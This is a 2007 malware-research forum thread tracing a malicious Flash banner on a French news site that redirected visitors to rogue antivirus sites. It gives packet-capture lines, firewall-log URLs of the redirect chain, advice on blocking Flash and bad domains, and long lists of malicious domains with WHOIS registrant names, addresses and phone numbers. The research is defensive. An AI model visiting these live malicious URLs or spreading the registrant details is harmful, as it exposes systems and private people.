Help - Search - Members - Calendar
Full Version: Flash Mystery
B.I.S.S. Forums > Malware Research Forum > Malware Playground
Pages: 1, 2, 3, 4, 5, 6
Kimberly
Recently many people got redirected to rogue products such as ErrorSafe, Malware-Scan, PerformanceOptimizer, Erreur Chasseur for French people as they are geo location based. I got myself hit by such advertisements in my Virtual Machine while surfing on legitimate and serious websites.

<h4>
References to read
</h4>
Content of http://www.bluetack.co.uk/forums/index.php?showtopic=18044

Malicious advertisements and advertising fraud.
http://msmvps.com/blogs/spywaresucks/archi...08/1386804.aspx

Il mistero (svelato) della redirezione su ToolSicuro
http://www.suspectfile.com/wblog/?p=41

Translated version of ToolSicuro using Google:
http://translate.google.com/translate?u=ht...en&ie=UTF-8

Rogue ads pushing malware -- how it works
http://sunbeltblog.blogspot.com/2007/11/ro...d-networks.html

Mike On Ads - ErrorSafe
http://www.mikeonads.com/what-is-errorsafe...-do-we-stop-it/

The article from SuspectFile explains the mechanism very well so there isn't much to add. Most people of the spyware community got intrigued, myself included. Below is a small summary of the investigation I started yesterday but the main purpose of this article will be:

Can I protect myself from these adverts?

Ready for a flashy ride? Ok let's take off ...

Unless you know what you're doing or have a VM handy, don't play with this please.

<h4>
Step 1 - Getting infected again
</h4>
Since I know where I got the malicious swf file, it didn't take much time to get infected again. I was simply reading the news on a French website. So fasten your seat belts and let's surf over there again but this time with Ethereal running since we must trace the connections. Take off to Le Nouvel Observateur. Since adverts are rotating, it might take a couple of minutes to get the swf file, so let’s follow a few links on the main page. It took only a few mouse clicks to obtain the desired result. In the middle of reading a chapter, my Internet Browser sort of “vanished” and PerformanceOptimizer was all there was left on my desktop.

IPB Image
Clicking Ok or Cancel doesn't really matter ...
BTW, nice imitation of My Computer ... those guys are really inventive. laugh.gif

IPB Image
Back, Next, Cancel .... your choice. All roads lead to Rome.

IPB Image
Let's move on to the next part.

<h4>
Step 2 - Tracking the advert
</h4>
This part is time consuming as it does involve quite some reading. The firewall log may permit to narrow down – in other words spotting the link that is responsible for the infection.
I knew had to search after newbieadguide(dot)com and performanceoptimizer(dot)com but that wasn’t enough to understand everything.
The Ethereal log shows an interesting detail called Referer.

CODE
Frame 9319 (477 bytes on wire, 477 bytes captured)
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: newbieadguide.com (217.150.254.40)
Transmission Control Protocol, Src Port: 2105 (2105), Dst Port: http (80), Seq: 1, Ack: 1, Len: 423
Hypertext Transfer Protocol
    GET /statsa.php?u=23423424&campaign=c0pperin HTTP/1.1\r\n
    Accept: */*\r\n
    Accept-Language: en-US\r\n
    Referer: http://uniprix.nouvelobs.com/RealMedia/ads/Creatives/OasDefault/NO_TEXBOOKX_MBAN_1107//textbookx_728x90.swf?
clickTag=http://uniprix.nouvelob\r\n
    x-flash-version: 9,0,115,0\r\n
    ~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: newbieadguide.com\r\n
    Connection: Keep-Alive\r\n
    \r\n

Looks like we have found our culprit.

<h4>
Step 3 - Trying to assemble the puzzle
</h4>
File: textbookx_728x90.swf shows 100% clean at Virustotal.

Below are 2 screenshots of the swf file showing a part of its code using 2 different programs.

It has some encrypted? obfuscated? action scripts in it, way beyond my skills to decode that. Looks like SWF Encrypt was used to obfuscate the code.
You’ll find some details on it’s content and how it triggers in the write-up made by SuspectFile.

IPB Image

IPB Image
See the mention Protected & Encrypted.
IPB Image
Next “links in the chain” are the following web sites token from the firewall log:

CODE
12/11/2007 4:15:39 AM,http://newbieadguide.com/swf/gnida.swf?campaign=c0pperin&u=23423424
12/11/2007 4:15:38 AM,http://newbieadguide.com/statsg.php?u=23423424&campaign=c0pperin
12/11/2007 4:15:38 AM,http://newbieadguide.com/statsa.php?u=23423424&campaign=c0pperin

Note: Read up from bottom to top for chronological order.

I will not detail those elements; only post them for historical purposes. If you really feel bored, you can always take a peek at the code of the php pages. wink.gif

newbieadguide.com/statsa.php
[attachmentid=767]

newbieadguide.com/statsg.php
[attachmentid=768]

"Chameleon" in gnida.swf (Refered by SuspectFile).
IPB Image

Action script from gnida.swf
[attachmentid=769]
<h4>
Tools used
</h4>
Flash Decompiler Trillix
http://www.decompiler-swf.com

Sothink SWF Decompiler
http://www.sothink.com/product/flashdecompiler/

Flare
http://www.nowrap.de/flare.html

SWF Encrypt™ 4.0
http://www.amayeta.com/

Ethereal
http://www.ethereal.com
Kimberly
Can I protect myself from these adverts?

Hundreds of domains are “serving” this crap. So what's the miracle solution? I’m sorry I can’t offer the perfect way of handling this. I can simply suggest a few mesures.

<h4>
The HOSTS file
</h4>
You won’t get redirected to any of the sites included in the file. Thus by adding newbieadguide.com and all the other "known" domains, you still will be able to see the initial flash advert but you won't get redirected to the rogue site.
Con of this approach are the "unknown" domains. New domains are probably ready to serve the same redirects and before they are spotted, many innocent people will be hit over and over again. But it does help a little bit.

<h4>
Firewall
</h4>
If you have a firewall with ad blocking capacities, activate them. Most of them block banners if they meet some conditions based upon size, keywords, etc … It isn’t perfect but it surely helps.

IPB Image

IPB Image
<h4>
Manage Add-ons in Internet Explorer
</h4>
Open up Internet Explorer and select Tools > Manage Add-ons.
Depending on your Internet version, the options might vary a bit. Either look under Add-ons currently loaded in Internet Explorer or under Add-ons that have been used by Internet Explorer. IE7 has an additional option too.

Select the Shockwave Flash Object and set its status to disabled. Ok the boxes and restart Internet Explorer as required.
IPB Image
Internet Explorer 8
IPB Image
Internet Explorer add-ons: frequently asked questions
http://windowshelp.microsoft.com/Windows/e...df9b7e1033.mspx

How to Configure Enhanced Security Features for Internet Explorer from Windows XP SP2
http://www.microsoft.com/technet/security/...xp/iesecxp.mspx

How to manage Internet Explorer add-ons in Windows XP Service Pack 2
http://support.microsoft.com/kb/883256

Add-on Management Improvements in Internet Explorer 8
http://blogs.msdn.com/ie/archive/2008/03/2...explorer-8.aspx

<h4>
NoScript for Firefox
</h4>
Install NoScript for Firefox if not yet done.
Right click the icon in the status bar and select Options.

IPB Image
Put a checkmark next to Forbid Macromedia Flash. I would recommend checking Apply these restrictions to trusted sites to. If you only have a few trusted sites then you might leave that unchecked. Everything depends on your other settings.

IPB Image
More information can be found at the Noscript website

While you are installing plugins and securing Firefox, you might also add AdblockPlus on your ToDo list.

<h4>
Setting the "killbit" for Flash
</h4>
If you don’t want to mess around with the Internet Explorer Add-ons or Noscript, you can always set the killbit for Shockwave.

You can perform this task in various ways:Of course with the last 3 methods you won’t be able to see Flash animations no matter what webpage you visit. But that’s a very small price to stay protected imo.

<h4>
Uninstall Flash
</h4>
How to uninstall the Adobe Flash Player plug-in and ActiveX control

Other Flash related links:Now it's up to you all. Happy surf. smile.gif
Kimberly
On 17 December I received a positive response from the Nouvel Observateur, the banner was removed from the website.

Several banners are still active and present on internet, so webmasters take your responsibilities and take them down please. In doubt get them analysed and contribute to keep internet clean & safe.
Kimberly
As mentionned above, people are redirected based upon their geo location. The list below reflects the main domains and their "associated" IP's / domains. The redirects I did stumble on during tests are listed in red (main domains not included).
The list is still a work in progress and I'll keep it updated as much as possible.

<h4>
Main domains
</h4>
newbieadguide.com - 217.150.254.40

Server Type: Apache
IP Location - Switzerland - Nine Internet Solutions Ag
Dedicated Hosting: newbieadguide.com is hosted on a dedicated server.

Record last updated on 24-Apr-2007.
Record expires on 20-Apr-2008.
Record created on 20-Apr-2007.

Domain servers in listed order:
NS2.NEWBIEADGUIDE.COM 190.15.73.252
NS1.NEWBIEADGUIDE.COM 190.15.73.251
______________________________

vozemiliogaranon.com - 217.150.254.41

Server Type: Apache
IP Location - Switzerland - Pc Ions Incorporation

Domain Name : vozemiliogaranon.com

::Registrant::
Name : Vozemiliogaranon
Email : mail(at)vozemiliogaranon.com
Address : kit street 56 Norn
Zipcode : 54451
Nation : BE
Tel : 54544
Fax :

::Administrative Contact::
Name : Vozemiliogaranon
Email : mail(at)vozemiliogaranon.com
Address : kit street 56 Norn
Zipcode : 54451
Nation : BE
Tel : 54544
Fax :

::Technical Contact::
Name : Vozemiliogaranon
Email : mail(at)vozemiliogaranon.com
Address : kit street 56 Norn
Zipcode : 54451
Nation : BE
Tel : 54544
Fax :

::Name Servers::
ns1.vozemiliogaranon.com
ns2.vozemiliogaranon.com
ns3.vozemiliogaranon.com
ns4.vozemiliogaranon.com

::Dates & Status::
Created Date 2007-11-23 04:58:49 EST
Updated Date 2007-11-23 04:58:49 EST
Valid Date 2008-11-23 04:58:49 EST
Status ACTIVE
______________________________

thetechnorati.com - 217.150.254.44

Server Type: Apache
IP Location - Switzerland - Nine Internet Solutions Ag

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-07
Domain Name : thetechnorati.com

::Registrant::
Name : Thetechnorati
Email : mail(at)thetechnorati.com
Address : Notr str 89
Zipcode : 7PO78
Nation : DK
Tel : 4554
Fax :

::Administrative Contact::
Name : Thetechnorati
Email : mail(at)thetechnorati.com
Address : Notr str 89
Zipcode : 7PO78
Nation : DK
Tel : 4554
Fax :

::Technical Contact::
Name : Thetechnorati
Email : mail(at)thetechnorati.com
Address : Notr str 89
Zipcode : 7PO78
Nation : DK
Tel : 4554
Fax :

::Name Servers::
ns1.thetechnorati.com
ns2.thetechnorati.com
ns3.thetechnorati.com
ns4.thetechnorati.com

::Dates & Status::
Created Date 2007-11-23 05:13:25 EST
Updated Date 2007-11-23 05:13:25 EST
Valid Date 2008-11-23 05:13:25 EST
Status ACTIVE
______________________________

akamahi.net - 217.150.254.45

Server Type: Apache
IP Location - Switzerland - Nine Internet Solutions Ag

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-23
Domain Name : akamahi.net

::Registrant::
Name : Akamahi
Email : mail@akamahi.net
Address : Lion str 45
Zipcode : 5651
Nation : CR
Tel : 45445
Fax :

::Administrative Contact::
Name : Akamahi
Email : mail@akamahi.net
Address : Lion str 45
Zipcode : 5651
Nation : CR
Tel : 45445
Fax :

::Technical Contact::
Name : Akamahi
Email : mail@akamahi.net
Address : Lion str 45
Zipcode : 5651
Nation : CR
Tel : 45445
Fax :

::Name Servers::
ns1.akamahi.net
ns2.akamahi.net
ns3.akamahi.net
ns4.akamahi.net

::Dates & Status::
Created Date 2007-11-23 05:18:08 EST
Updated Date 2007-11-23 05:18:08 EST
Valid Date 2008-11-23 05:18:08 EST
Status ACTIVE
______________________________

adtraff.com - 84.243.252.84

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: adtraff.com is hosted on a dedicated server.

Record last updated on 02-Nov-2007.
Record expires on 13-Apr-2008.
Record created on 13-Apr-2007.

Domain servers in listed order:
NS1.ADTRAFF.COM 190.15.73.251
NS2.ADTRAFF.COM 190.15.73.252
______________________________

burnads.com - 84.243.252.85

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: burnads.com is hosted on a dedicated server.

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-11
Domain Name : burnads.com

::Registrant::
Name : Ines Hadden
Email : burnads_c(at)yahoo.com
Address : 48, boulevard de Port Royal, Paris
Zipcode : 75005
Nation : FR
Tel : 164233375
Fax :

::Administrative Contact::
Name : Ines Hadden
Email : burnads_c(at)yahoo.com
Address : 48, boulevard de Port Royal, Paris
Zipcode : 75005
Nation : FR
Tel : 164233375
Fax :

::Technical Contact::
Name : Ines Hadden
Email : burnads_c(at)yahoo.com
Address : 48, boulevard de Port Royal, Paris
Zipcode : 75005
Nation : FR
Tel : 164233375
Fax :

::Name Servers::
ns1.burnads.com
ns2.burnads.com

::Dates & Status::
Created Date 2006-06-29 05:33:08 EDT
Updated Date 2007-06-27 17:54:41 EDT
Valid Date 2008-06-29 05:33:08 EDT
Status ACTIVE
______________________________

mysurvey4u.com - uniqads.com - traffalo.com - traveltray.com - 190.15.73.254

Server Type: lighttpd/1.4.13
IP Location - Francisco Morazan - Tegucigalpa - Secure Hosting Ltd
Reverse IP: 107 other sites hosted on this server.


mysurvey4u.com

Error Message
There was an error processing your request.

Domain History
Cache Date: 2007-12-14
Domain Name : mysurvey4u.com

::Registrant::
Name : MARKUS MCCOY
Email : mysurvey_4u(at)yahoo.com
Address : 5th Hancock Ave, Murrieta CA
Zipcode : 25405
Nation : US
Tel : 951-461-2785
Fax :

::Administrative Contact::
Name : MARKUS MCCOY
Email : mysurvey_4u(at)yahoo.com
Address : 5th Hancock Ave, Murrieta CA
Zipcode : 25405
Nation : US
Tel : 951-461-2785
Fax :

::Technical Contact::
Name : MARKUS MCCOY
Email : mysurvey_4u(at)yahoo.com
Address : 5th Hancock Ave, Murrieta CA
Zipcode : 25405
Nation : US
Tel : 951-461-2785
Fax :

::Name Servers::
ns1.mysurvey4u.com
ns2.mysurvey4u.com

::Dates & Status::
Created Date 2006-12-04 09:57:28 EST
Updated Date 2007-12-03 20:06:35 EST
Valid Date 2008-12-04 09:57:28 EST
Status ACTIVE


uniqads.com

Record last updated on 08-Jun-2007.
Record expires on 27-Apr-2008.
Record created on 27-Apr-2007.

Domain servers in listed order:
NS2.UNIQADS.COM 190.15.73.252
NS1.UNIQADS.COM 190.15.73.251


traffalo.com

Record last updated on 26-Apr-2007.
Record expires on 13-Apr-2008.
Record created on 13-Apr-2007.

Domain servers in listed order:
NS1.TRAFFALO.COM 190.15.73.251
NS2.TRAFFALO.COM 190.15.73.252


traveltray.com

Record last updated on 02-Jun-2007.
Record expires on 01-Jul-2008.
Record created on 01-Jul-2004.

Domain servers in listed order:
NS1.TRAVELTRAY.COM 190.15.73.251
NS2.TRAVELTRAY.COM 190.15.73.252

<h4>
Closest Relationships
</h4>
newbieadguide.com

domains sharing mailservers
  • ad2cash.net
  • adtraff.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • deuscleanerpay.com
  • errordigger.com
  • errorinspector.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • netmediagroup.net
  • netturbopro.com
  • opensols.com
  • popupnukerpro.com
  • sellmoresoft.net
  • sellmysoft.net
  • traffalo.com
  • unicsearch.com
  • uniqads.com
  • windefender.com
  • zappinads.com
domains sharing nameservers
  • ad2cash.net
  • adcomatoz.com
  • adtraff.com
  • b2adz.com
  • blessedads.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • megashopcity.com
  • mysurvey4u.com
  • netmediagroup.net
  • netturbopro.com
  • popadprovider.com
  • popupnukerpro.com
  • prevedmarketing.com
  • r2d2adverising.com
  • sellmoresoft.net
  • sellmysoft.net
  • shivanetworking.com
  • traffalo.com
  • traveltray.com
  • unicsearch.com
  • uniqads.com
  • upg-soft.net
  • windefender.com
  • yourshopz.com
  • zappinads.com
subdomains
  • mail.newbieadguide.com
  • ns1.newbieadguide.com
  • ns2.newbieadguide.com
  • www newbieadguide.com
______________________________

vozemiliogaranon.com

domains sharing nameservers
  • advancedcleaner.com
  • akamahi.net
  • antispywaresuite.com
  • antiviruspcsuite.com
  • bestsellerantivirus.com
  • diskretter.com
  • elmejorantivirus.com
  • erreurchasseur.com
  • exterminadordevirus.com
  • moncontenuassistant.com
  • schijfbewaker.com
  • securepccleaner.com
  • spyguardpro.com
  • storageprotector.com
  • systemdoctor.com
  • thetechnorati.com
  • toolsicuro.com
subdomains
  • ns1.vozemiliogaranon.com
  • ns2.vozemiliogaranon.com
  • ns3.vozemiliogaranon.com
  • ns4.vozemiliogaranon.com
______________________________

thetechnorati.com

domains sharing nameservers
  • advancedcleaner.com
  • antispywaresuite.com
  • antiviruspcsuite.com
  • bestsellerantivirus.com
  • diskretter.com
  • elmejorantivirus.com
  • erreurchasseur.com
  • exterminadordevirus.com
  • moncontenuassistant.com
  • schijfbewaker.com
  • securepccleaner.com
  • spyguardpro.com
  • storageprotector.com
  • systemdoctor.com
  • toolsicuro.com
  • vozemiliogaranon.com
subdomains
  • ns1.thetechnorati.com
  • ns2.thetechnorati.com
  • ns3.thetechnorati.com
  • ns4.thetechnorati.com
______________________________

akamahi.net

domains sharing nameservers
  • advancedcleaner.com
  • antispywaresuite.com
  • antiviruspcsuite.com
  • bestsellerantivirus.com
  • diskretter.com
  • elmejorantivirus.com
  • erreurchasseur.com
  • exterminadordevirus.com
  • moncontenuassistant.com
  • schijfbewaker.com
  • securepccleaner.com
  • spyguardpro.com
  • storageprotector.com
  • systemdoctor.com
  • thetechnorati.com
  • toolsicuro.com
  • vozemiliogaranon.com
subdomains
  • ns1.akamahi.net
  • ns2.akamahi.net
  • ns3.akamahi.net
  • ns4.akamahi.net
______________________________

mysurvey4u.com

hostnames sharing ip with a-records
  • ns1.1downlinebuilder.info
  • ns2.1downlinebuilder.info
domains sharing mailservers
  • advancedcleaner.com
  • boysmag.net
  • crazycinema.net
  • gaychoice.net
  • globalsoftcash.net
  • iseekporn.net
  • traveltray.com
  • videosexygirls.net
  • viragehosting.com
domains using this as nameserver
  • 1downlinebuilder.info
domains sharing nameservers
  • ad2cash.net
  • adcomatoz.com
  • adtraff.com
  • b2adz.com
  • blessedads.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • megashopcity.com
  • netmediagroup.net
  • netturbopro.com
  • newbieadguide.com
  • popadprovider.com
  • popupnukerpro.com
  • prevedmarketing.com
  • r2d2adverising.com
  • sellmoresoft.net
  • sellmysoft.net
  • shivanetworking.com
  • traffalo.com
  • traveltray.com
  • unicsearch.com
  • uniqads.com
  • upg-soft.net
  • windefender.com
  • yourshopz.com
  • zappinads.com
______________________________

traveltray.com

hostnames sharing ip with a-records
  • ns2.1easy-breezy.info
domains sharing mailservers
  • advancedcleaner.com
  • boysmag.net
  • crazycinema.net
  • gaychoice.net
  • globalsoftcash.net
  • iseekporn.net
  • mysurvey4u.com
  • videosexygirls.net
  • viragehosting.com
domains using this as nameserver
  • 1easy-breezy.info
domains sharing nameservers
  • ad2cash.net
  • adcomatoz.com
  • adtraff.com
  • b2adz.com
  • blessedads.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • megashopcity.com
  • mysurvey4u.com
  • netmediagroup.net
  • netturbopro.com
  • newbieadguide.com
  • popadprovider.com
  • popupnukerpro.com
  • prevedmarketing.com
  • r2d2adverising.com
  • sellmoresoft.net
  • sellmysoft.net
  • shivanetworking.com
  • traffalo.com
  • unicsearch.com
  • uniqads.com
  • upg-soft.net
  • windefender.com
  • yourshopz.com
  • zappinads.com
______________________________

uniqads.com - traffalo.com - burnads.com

domains sharing mailservers
  • ad2cash.net
  • adtraff.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • deuscleanerpay.com
  • errordigger.com
  • errorinspector.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • netmediagroup.net
  • netturbopro.com
  • newbieadguide.com
  • opensols.com
  • popupnukerpro.com
  • sellmoresoft.net
  • sellmysoft.net
  • traffalo.com
  • unicsearch.com
  • windefender.com
  • zappinads.com
domains sharing nameservers
  • ad2cash.net
  • adcomatoz.com
  • adtraff.com
  • b2adz.com
  • blessedads.com
  • bucksbill.com
  • burnads.com
  • cryptdrive.com
  • fileprotector.com
  • forceup.com
  • freetvnow.net
  • megashopcity.com
  • mysurvey4u.com
  • netmediagroup.net
  • netturbopro.com
  • newbieadguide.com
  • popadprovider.com
  • popupnukerpro.com
  • prevedmarketing.com
  • r2d2adverising.com
  • sellmoresoft.net
  • sellmysoft.net
  • shivanetworking.com
  • traffalo.com
  • traveltray.com
  • unicsearch.com
  • upg-soft.net
  • windefender.com
  • yourshopz.com
  • zappinads.com
<h4><div align="center">190.15.73.254</div></h4>
  1. Ad2cash.net
  2. Ad2profit.com
  3. Adcomatoz.com
  4. Adgurman.com
  5. Adhokuspokus.com
  6. Adnetserver.com
  7. Adredired.com
  8. Adsolutio.com
  9. Adverdaemon.com
  10. Adverlounge.com
  11. Adzyclon.com
  12. Antivirussecuritypro.com
  13. Astalaprofit.com
  14. B2adz.com
  15. Bestadmedia.com
  16. Bestpharmacydeals.com
  17. Bestsearchnet.com
  18. Bestshopz.com
  19. Bestwnvmovies.com
  20. Bizadverts.com
  21. Bizmarketads.com
  22. Blessedads.com
  23. Brandmarketads.com
  24. Bucksinsoft.com
  25. Cancerno.com
  26. Cashloanprofit.com
  27. Casinoaceking.com
  28. Casinodealsgalore.com
  29. Cheap-auto-deals.com
  30. Co-search.com
  31. Deuscleanerpay.com
  32. Easybestdeals.com
  33. Eroticabsolute.com
  34. Fantazybill.com
  35. Favouriteshop.com
  36. Fileprotector.com
  37. Freepcsecure.com
  38. Freetvnow.net
  39. Friedads.com
  40. Getfreecar.com
  41. Glorymarkets.com
  42. Great4mac.com
  43. Greyhathosting.com
  44. Hebooks-service.com
  45. Iddqdmarketing.com
  46. Infyte.com
  47. Installprovider.com
  48. Internetadaultfriend.com
  49. Intervarioclick.com
  50. Invulnerableads.com
  51. Keywordcpv.com
  52. Libresystm.com
  53. Luckyadcoin.com
  54. Luckyadsols.com
  55. Magicsearcher.com
  56. Manage-search.com
  57. Marketingdungeon.com
  58. Mediatornado.com
  59. Megashopcity.com
  60. Mightyfaq.com
  61. Misc-search.com
  62. Mobilesoftmarketing.com
  63. Moneycometrue.com
  64. Moneypalacecash.com
  65. Myfavouritesearch.com
  66. Myhealth-life.org
  67. Myonlinefinance.com
  68. Mysurvey4u.com
  69. Mythmarketing.com
  70. Mytravelgeek.com
  71. Netturbopro.com
  72. Onestopshopz.com
  73. Opensols.com
  74. Pcsoftw.com
  75. Pcsupercharger.com
  76. Popadprovider.com
  77. Popsmedia.com
  78. Popupnukerpro.com
  79. Prenetsearch.com
  80. Prevedmarketing.com
  81. Prizesforyou.com
  82. R2d2adverising.com
  83. Rocktheads.com
  84. Roller-search.com
  85. Rombic-search.com
  86. Searchcolours.com
  87. Sellmoresoft.com
  88. Selvascreensaver.com
  89. Sharpadverts.com
  90. Shivanetworking.com
  91. Shopshot.com
  92. Softwcs.com
  93. Stratosearch.com
  94. Swiftcleaner.com
  95. Tallgrass-seach.com
  96. Traffalo.com
  97. Traveltray.com
  98. Uniqads.com
  99. Vitecmedia.com
  100. Waytotheprofit.com
  101. Windefender.com
  102. Wontu-search.com
  103. Workhomecenter.com
  104. Yourseeker.com
  105. Yourshopz.com
  106. Yourteacheronline.com
  107. Zappinads.com
  108. Zooworld-search.com
<h4><div align="center">84.243.253.220</div></h4>
  1. Anonymbrowser.com
  2. Blablahost.com
  3. Errordigger.com
  4. Errorinspector.com
  5. Passwordinspector.com
  6. Performanceoptimizer.com
  7. Sellmosoft.net
  8. Internetsupernanny.com
<h4>
77.91.229.103
</h4>
  1. Malware-scan.com
  2. Xmalware-scan.com
<h4>
77.91.229.104
</h4>
  1. scanner2.malware-scan.com
<h4>
67.55.81.200
</h4>
  1. Accelerateurmaligne.com
  2. Aceleradorlisto.com
  3. Addioerrori.com
  4. Adremversneller.com
  5. Anonymwinpc.com
  6. Antimalwareshield.com
  7. Antispywarecontrole.com
  8. Antispywarecontrollo.com
  9. Antispywarekontrolle.com
  10. Antispywareseigyo.com
  11. Antivirusgereedschap.com
  12. Antivirusscherm.com
  13. Antivirussolusjon.com
  14. Aucunsvirus.com
  15. Avsystemcare.com
  16. Bedsteantivirus.com
  17. Bereiniger.com
  18. Cleverspeeder.com
  19. Controlantiespia.com
  20. Defectshuri.com
  21. Doraibuhogo.com
  22. Easysprinter.com
  23. Echterschutz.com
  24. Effaceurvirus.com
  25. Elevarendimiento.com
  26. Enkelsprinter.com
  27. Errclean.com
  28. Erreurchasseur.com
  29. Fiksfeil.com
  30. Fixmenaces.com
  31. Handigebeheerder.com
  32. Harddrevvagt.com
  33. Hataduzelticisi.com
  34. Herramientadereparacion.com
  35. Hukommelsesbeskytter.com
  36. Hulpprogramma.com
  37. Kansennashi.com
  38. Kantansprinter.com
  39. Keinespuren.com
  40. Keinestoerungen.com
  41. Klogspeeder.com
  42. Klugerspeeder.com
  43. Kontentsueraser.com
  44. Kvikkpc.com
  45. Kyoishusei.com
  46. Leichtersprinter.com
  47. Lettsprinter.com
  48. Liberapc.com
  49. Lifelongpc.com
  50. Maskinpcpro.com
  51. Megaviruskit.com
  52. Megliopc.com
  53. Melhorpc.com
  54. Memoiredefenseur.com
  55. Mendingtool.com
  56. Minnesverktyg.com
  57. Moncontenuassistant.com
  58. Msahihalakhtaa.com
  59. Nemsprinter.com
  60. Nettoyagevirus.com
  61. Nientevirus.com
  62. Nochanceforvirus.com
  63. Noespias.com
  64. Nulinfektioner.com
  65. Ottimizzaveloce.com
  66. Pasokoneiju.com
  67. Pcforbedring.com
  68. Pclyftare.com
  69. Pcohneviren.com
  70. Pcoppdrettere.com
  71. Pcopschoner.com
  72. Pcopschoningsstel.com
  73. Pcraiser.com
  74. Pcreveil.com
  75. Pcsamensteller.com
  76. Pcscattista.com
  77. Pcschirmer.com
  78. Pcverdediger.com
  79. Performancekoujou.com
  80. Privacidadplus.com
  81. Protectioncomplete.com
  82. Puliscitutto.com
  83. Pulitasystem.com
  84. Rendator.com
  85. Rensningverktyg.com
  86. Reparameacas.com
  87. Reparamenazas.com
  88. Reparetudo.com
  89. Scattofacile.com
  90. Shufukutsuru.com
  91. Sicheressystem.com
  92. Sininfecciones.com
  93. Smartkasoku.com
  94. Smartokare.com
  95. Sprinterfacile.com
  96. Sprinterpc.com
  97. Sysdepannage.com
  98. Syskontroller.com
  99. Systemfreigabe.com
  100. Systemreiniging.com
  101. Tabortvirus.com
  102. Temizsurucu.com
  103. Utiledeprotection.com
  104. Varrevirus.com
  105. Velocidadsimple.com
  106. Vigilamenazas.com
  107. Virenloescher.com
  108. Virenstopper.com
  109. Virtual-leatherman.com
  110. Virusfjernere.com
  111. Virusudryddet.com
  112. Winadsiz.com
  113. Winanonyme.com
  114. Winanonymitet.com
  115. Winanzen.com
  116. Winbescherming.com
  117. Windefensa.com
  118. Windifesavirale.com
  119. Winhogo.com
  120. Winkujoenjin.com
  121. Winpcalmeglio.com
  122. Winpcdocteur.com
  123. Winpcdoktor.com
  124. Winpckontroll.com
  125. Winpcrensare.com
  126. Winpcrensere.com
  127. Winriservatezza.com
  128. Winsecurite.com
  129. Winsikkerantivirus.com
  130. Winsikretav.com
  131. Winsurffilter.com
  132. Wintemizleyicisi.com
  133. Wintrygghet.com
  134. Wirusumuryokuka.com
  135. Yoursystemguard.com
<h4>
87.117.252.11
</h4>
  1. Acchiappavirus.com
  2. Adiosvirus.com
  3. Ahorrememoria.com
  4. Altalimpeza.com
  5. Anonimutente.com
  6. Antiamenazas.com
  7. Antiespiamaestro.com
  8. Antievidence.com
  9. Antispionimaestro.com
  10. Antispywareconductor.com
  11. Antispywarecontrol.com
  12. Antispywaremaster.com
  13. Antispywaremeister.com
  14. Antispywaresuite.com
  15. Antivirusfiable.com
  16. Antivirusforall.com
  17. Antivirusforalla.com
  18. Antivirusforalle.com
  19. Antivirusfueralle.com
  20. Antivirusgenial.com
  21. Antivirusmagique.com
  22. Antivirusparatodos.com
  23. Antiviruspcsuite.com
  24. Anzentsuru.com
  25. Apagahistorico.com
  26. Apolloantivirus.com
  27. Archivosenestado.com
  28. Atemaiserro.com
  29. Atrapavirus.com
  30. Aucunchoixpourvirus.com
  31. Aucunefaute.com
  32. Aucuninfection.com
  33. Aucunmenace.com
  34. Aucunserreurs.com
  35. Avcompleto.com
  36. Avsecurityplus.com
  37. Avseguro.com
  38. Bandoaivirus.com
  39. Bandoalleinfezioni.com
  40. Barreraintegral.com
  41. Bastioneantivirus.com
  42. Beschermingstool.com
  43. Beskyttelseonline.com
  44. Beskyttendevaerktoj.com
  45. Bestsellerantivirus.com
  46. Blanchdisc.com
  47. Borresuspasos.com
  48. Bossedeserreurs.com
  49. Brossedesfautes.com
  50. Bugseraser.com
  51. Caiforavirus.com
  52. Ceroamenazas.com
  53. Cerovirus.com
  54. Chasseurdeserreures.com
  55. Cleanerpotente.com
  56. Cleanpctool.com
  57. Cleanuptool.com
  58. Confidentsurf.com
  59. Confidentuser.com
  60. Contenidoseguros.com
  61. Contenteraser.com
  62. Controledemenaces.com
  63. Controlloreprivacy.com
  64. Curerrores.com
  65. Dataconfidentiality.com
  66. Defensaantivirus.com
  67. Defensecelebre.com
  68. Defensededriver.com
  69. Defensedinformation.com
  70. Defensedudisque.com
  71. Defensenetsurfage.com
  72. Defensivesystem.com
  73. Dejitarufukugen.com
  74. Dejitarukyoikira.com
  75. Dejitaruwakuchin.com
  76. Detapurotekuta.com
  77. Detaripea.com
  78. Detectaerrores.com
  79. Discoseguro.com
  80. Diskassistent.com
  81. Diskretter.com
  82. Disksaeuberung.com
  83. Disksizesaver.com
  84. Disksparare.com
  85. Disukushuri.com
  86. Doubledefender.com
  87. Driversecurise.com
  88. Einwandfreierpc.com
  89. Eliminadordeamenazas.com
  90. Elmejorantivirus.com
  91. Emperahogo.com
  92. Enmiendaerrores.com
  93. Equipoantiespia.com
  94. Eracheisa.com
  95. Erasutoppu.com
  96. Errorfighter.com
  97. Essentialeraser.com
  98. Expertdantispyware.com
  99. Exterminadordevirus.com
  100. Extremuclean.com
  101. Fairukyua.com
  102. Fehlerbeseitiger.com
  103. Feilvakt.com
  104. Fejlfripc.com
  105. Fejlreparering.com
  106. Felfixare.com
  107. Ferramentadesolucao.com
  108. Ferramentasegura.com
  109. Festplattencleaner.com
  110. Festplattenreiniger.com
  111. Festplattentool.com
  112. Fiksdinpc.com
  113. Filtredetraces.com
  114. Filtrototal.com
  115. Fixthemnow.com
  116. Fjernervirus.com
  117. Foutenwacht.com
  118. Geheugenredder.com
  119. Guardiandelaprivacidad.com
  120. Guardianodelpc.com
